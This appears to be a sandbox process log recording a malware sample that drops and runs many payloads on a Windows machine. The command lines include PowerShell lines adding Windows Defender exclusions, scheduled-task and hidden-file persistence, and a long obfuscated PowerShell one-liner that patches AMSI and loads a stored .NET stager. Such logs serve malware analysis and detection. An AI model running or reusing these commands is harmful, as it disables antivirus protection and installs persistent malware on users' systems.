"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping [...]-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczOTI5NDgzNCIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNzY2NTUyNTM3MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUzMTEyNzI0MjAiLz48L2FwcD48L3JlcXVlc3Q-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3256 -childID 6 -isForBrowser -prefsHandle 3456 -prefMapHandle 2840 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f433fd1-071a-4ba0-8e0e-b7fa991ec34e} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5448 -childID 7 -isForBrowser -prefsHandle 5424 -prefMapHandle 5440 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebd8e86f-5ca9-4f13-9c64-e4be28907c4b} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 8 -isForBrowser -prefsHandle 6428 -prefMapHandle 2956 -prefsLen 33998 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4679e6b9-9569-4719-aad4-d727965235fc} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6440 -childID 9 -isForBrowser -prefsHandle 1640 -prefMapHandle 6620 -prefsLen 27941 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a408787-ffd7-4646-a7b9-2b98af782eb8} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6680 -childID 10 -isForBrowser -prefsHandle 6892 -prefMapHandle 6888 -prefsLen 27941 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b774784c-8211-47dc-90c4-10b9449fb05a} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\MicrosoftEdge_X64_133.0.3065.59.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff785436a68,0x7ff785436a74,0x7ff785436a80
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff785436a68,0x7ff785436a74,0x7ff785436a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6acd96a68,0x7ff6acd96a74,0x7ff6acd96a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6acd96a68,0x7ff6acd96a74,0x7ff6acd96a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6acd96a68,0x7ff6acd96a74,0x7ff6acd96a80
C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe
"C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe"
C:\Program Files\ProcessMonitor\Procmon64.exe
"C:\Program Files\ProcessMonitor\Procmon64.exe"
C:\Program Files\ProcessMonitor\Procmon.exe
"C:\Program Files\ProcessMonitor\Procmon.exe"
C:\Users\Admin\AppData\Local\Temp\Procmon64.exe
"C:\Users\Admin\AppData\Local\Temp\Procmon64.exe" /originalpath "C:\Program Files\ProcessMonitor\Procmon.exe"
C:\Program Files\sysint\Procmon64.exe
"C:\Program Files\sysint\Procmon64.exe"
C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\Fast%20Download.exe
"C:\Users\Admin\Desktop\Files\Fast%20Download.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
C:\Users\Admin\Desktop\Files\XClient.exe
"C:\Users\Admin\Desktop\Files\XClient.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\Desktop\Files\built.exe
"C:\Users\Admin\Desktop\Files\built.exe"
C:\Users\Admin\Desktop\Files\key.exe
"C:\Users\Admin\Desktop\Files\key.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 400
C:\Users\Admin\Desktop\Files\contorax.exe
"C:\Users\Admin\Desktop\Files\contorax.exe"
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
"C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\T4gy0CnbOZcl.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2wVHvYK17sCW.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\Sentil.exe
"C:\Users\Admin\Desktop\Files\Sentil.exe"
C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe
"C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\Files\Security.exe
"C:\Users\Admin\Desktop\Files\Security.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\Files\Client-built.exe
"C:\Users\Admin\Desktop\Files\Client-built.exe"
C:\Users\Admin\AppData\Local\Temp\$77Security.exe
"C:\Users\Admin\AppData\Local\Temp\$77Security.exe"
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eYxrkBgfPWtB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mqPvfiVZWPJRjr,[Parameter(Position=1)][Type]$mpQFhykSbP)$jIppYFpwEhi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Refl'+'e'+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+'D'+'e'+'leg'+'a'+'te'+'T'+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+'n'+'s'+''+[Char](105)+'C'+'l'+'a'+'s'+''+'s'+',A'+[Char](117)+''+[Char](116)+'oC'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$jIppYFpwEhi.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+'g'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$mqPvfiVZWPJRjr).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$jIppYFpwEhi.DefineMethod(''+'I'+'nv'+'o'+'k'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+'H'+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+'i'+'g'+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+'lo'+'t'+''+','+'V'+[Char](105)+'rt'+'u'+'a'+[Char](108)+'',$mpQFhykSbP,$mqPvfiVZWPJRjr).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'ime'+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $jIppYFpwEhi.CreateType();}$AwvzxgReJitYU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'ste'+'m'+''+'.'+''+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+''+'W'+'i'+[Char](110)+''+'3'+'2'+'.'+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+'fe'+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+[Char](118)+'e'+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$QYVgjFKiADBKpP=$AwvzxgReJitYU.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+'r'+'oc'+'A'+''+'d'+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'St'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XuRSdepCyIHsseQFTlK=eYxrkBgfPWtB @([String])([IntPtr]);$frMFLkiRfMTXoGuBloAVuT=eYxrkBgfPWtB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XLkjeedKkrZ=$AwvzxgReJitYU.GetMethod(''+[Char](71)+'etMo'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'H'+'a'+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+'ll')));$ZMoanjlXjbTSRq=$QYVgjFKiADBKpP.Invoke($Null,@([Object]$XLkjeedKkrZ,[Object]('L'+[Char](111)+'a'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$JJEwvHNtPEjoRYuON=$QYVgjFKiADBKpP.Invoke($Null,@([Object]$XLkjeedKkrZ,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$EwGuUkl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZMoanjlXjbTSRq,$XuRSdepCyIHsseQFTlK).Invoke('a'+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$XvjloYXHHsDbZEtcY=$QYVgjFKiADBKpP.Invoke($Null,@([Object]$EwGuUkl,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+'S'+''+'c'+'anB'+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$ssvSumgWpx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JJEwvHNtPEjoRYuON,$frMFLkiRfMTXoGuBloAVuT).Invoke($XvjloYXHHsDbZEtcY,[uint32]8,4,[ref]$ssvSumgWpx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XvjloYXHHsDbZEtcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JJEwvHNtPEjoRYuON,$frMFLkiRfMTXoGuBloAVuT).Invoke($XvjloYXHHsDbZEtcY,[uint32]8,0x20,[ref]$ssvSumgWpx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+''+'W'+''+'A'+''+'R'+''+'E'+'').GetValue('$'+'7'+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KeBeUxMxt5rs.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2f5dd3e4-d53d-410e-b3fd-fc4b177ea6d0}
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Security" /tr "C:\Users\Admin\AppData\Roaming\$77Security.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fg8OiSm2W9aH.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\srtware.exe
"C:\Users\Admin\Desktop\Files\srtware.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2060 -ip 2060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 84
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0gCc6gLqbZ4p.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OSFpz9bh9GZK.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgDm2GH1LKVy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgDm2GH1LKVy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 2408 -ip 2408
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2408 -s 312
C:\Users\Admin\Desktop\Files\Pichon.exe
"C:\Users\Admin\Desktop\Files\Pichon.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\schtasks.exe
